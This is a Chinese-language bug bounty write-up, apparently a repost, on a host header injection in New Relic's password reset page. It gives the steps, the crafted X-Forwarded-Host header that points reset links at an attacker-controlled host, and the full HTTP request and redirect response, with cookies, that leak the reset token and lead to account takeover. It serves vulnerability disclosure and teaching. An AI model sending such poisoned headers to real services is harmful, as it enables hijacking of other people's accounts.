利用主机头注入来进行账户劫持

jiangmingzi

迪哥讲事 2023-10-05 15:35 发表于江苏

业务背景
这是一个密码重置功能。

复现步骤
打开密码重置链接: https://login.newrelic.com/passwords/forgot

输入受害者的电子邮件地址,然后单击重置和电子邮件密码

在Burp Suite中拦截HTTP请求,并添加X-Forwarded主机标头并写入类似如下内容:

1. attacker.com/.newrelic.com

复制代码

链接类似如下:

1. https://testing-now.000webhostapp.com/.newrelic.com/passwords/reset/a248d8b06e7b25a116859729cbc0e07e180d9fb197dadc04f30185512eecc811

复制代码

受害者将在他们的电子邮件中收到恶意链接，当点击时，将泄露用户的密码重置链接/令牌给攻击者，导致帐户被完全接管。

请求是类似下面这样的:

1. POST /passwords/forgot HTTP/1.1
   
2. Host: login.newrelic.com
   
3. X-Forwarded-Host: testing-now.000webhostapp.com/.newrelic.com
   
4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
   
5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
   
6. Accept-Language: en-US,en;q=0.5
   
7. Accept-Encoding: gzip, deflate
   
8. Content-Type: application/x-www-form-urlencoded
   
9. Content-Length: 626
   
10. Connection: close
    
11. Referer: https://login.newrelic.com/passwords/forgot
    
12. Cookie: _ga=GA1.2.1721374031.1568844736; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.1636905160.1568844739; ei_client_id=5d82b02df99b140010808282; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1568844750536-52713; _fbp=fb.1.1568844751467.1905354417; qca=P0-625668904-1568844751500; optimizelyEndUserId=oeu1568844783430r0.2931045891390677; ajs_anonymous_id=%22b1e86a3a-04a1-48f5-a1c9-37167a1991c8%22; s_fid=78F091CDC3B81C9E-153BD36510D98B56; intercom-id-cyym0u3i=9a67a50f-33f2-4fdb-b74f-7e8d058de750; adroll_fpc=8e6e5aa9e24ca0efac425a4b2c6d4c4e-s2-1568844790580; __ar_v4=YCNZVXZ6TJDJ3KMJRVGKFH%3A20190918%3A3%7CI7ZJI4CQMBCNHGOQ27AYQZ%3A20190918%3A3%7CDLQZ5QQWIFBZZM5ECJME6X%3A20190918%3A3; _golden_gate_session=DlKqVDqbL%2B6%2Fi298zevCA1yH1PgkIDlWIgCVNuUC2CbfqR55ZnQKWXdh8nIl2F3kP4u%2BC9gLAfxsg6jOWfPwuQVDa0GcDhR6VoddruVbqMGjdogry5tZvDs7K8BZkCVH49Z8KHpTXRAv7DJIjEePjX4LcqtNJzRs65Fm6Y97sFIzI4Hvm081ptYeD0Nk543GaLZMtTnT98Rgdu2nftfEV7PrfmqnXKUR%2FDHhVX%2BPjI0qjGZ3PyL3UX9EigZ%2BMcEFiFGPzQXKSW%2BAiVG4Y71rQBOfwm%2FlSz%2B8RGJ0WfEoL%2BBRDquU1w%2BOPxA2r3u8sU02xG4dg07nZeo%3D--SewvpLvUIyY0YJTh--bWuTrIMZhXu6MP8PDg2iZA%3D%3D
    
13. Upgrade-Insecure-Requests: 1

复制代码

响应如下:

1. HTTP/1.1 302 Found
   
2. Cache-Control: no-cache
   
3. Content-Length: 134
   
4. Content-Type: text/html; charset=utf-8
   
5. Date: Fri, 20 Sep 2019 00:49:19 GMT
   
6. Location: https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot
   
7. Server: nginx
   
8. Set-Cookie: _golden_gate_session=Awolm37t0RVohChn8c%2FTtEpVzRz%2BYUXP%2FC6eqVDXqoY7IHMmItXq6vRR%2FLr45q31mXIOFUemqprmptlEuI2mIRy5ZN84OGsjWJWIUnZ34e0ve4IJf0Iqjh%2BbnsP0elEXQ%2B7gm12%2FRlfO4KSXZl7kkKcMrECZo8jQ%2B2SzO9cfYA6DcqNP%2BxlJkqQmQuF8eRXBqGwisVdIBtYqzHLzJDl6n7cZoXW9EyX%2FPMOAuJ3YlxUFoomKE6Z2%2BfgmCKPxeEQRtne%2BvtTJH5xzvNUnyN3JTSNVo4y47xZvjcnYLPzdW1vhptWGxtiyF99zy%2BCqrj11VlLz5PA4Idf0H8OmTqLvzVT42C40SN8qRtz1jP%2BhDjuwDsAr9aDabjj4O41F7AoivfsBXf0vJanmXOmllZXqRiLmiV81nTAEOi5S8EBDbkT3TLrkIu1Uuo2TdkXCDQXyasWXzg%2F1zRI08xOgr6IgdOJhxbZy6Se2ToIMbsYRA532mzLKFXPq2xCIU%2FTuEWdFyXbk4w%2Bo5qH6z21Qqibl32S7VgkN%2Fc61SYJcyipdyJsWWKT6lhHnv%2BHeCGi4OoE3wonpFRm9Z7pNDh%2BamsTtBUOCQgJeNYYnyz35Ggeueeo%2BVYqC46qNpedWs%2B9vXIH%2FRVQguzv9rfU%3D--MxbKlXOo06QW75kP--4a4Glp1aMgEoV2XXukgnIA%3D%3D; path=/; HttpOnly; secure; SameSite=Lax
   
9. X-Content-Type-Options: nosniff
   
10. X-Download-Options: noopen
    
11. X-Frame-Options: DENY
    
12. X-Permitted-Cross-Domain-Policies: none
    
13. X-Request-Id: ec1ad038-4b96-4915-b107-3422151a3ab1
    
14. X-Runtime: 0.113080
    
15. X-Xss-Protection: 1; mode=block
    
16. Connection: close
    
17. <html><body>You are being <a href="https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot">redirected</a>.</body></html>
    
18. look at attachments

复制代码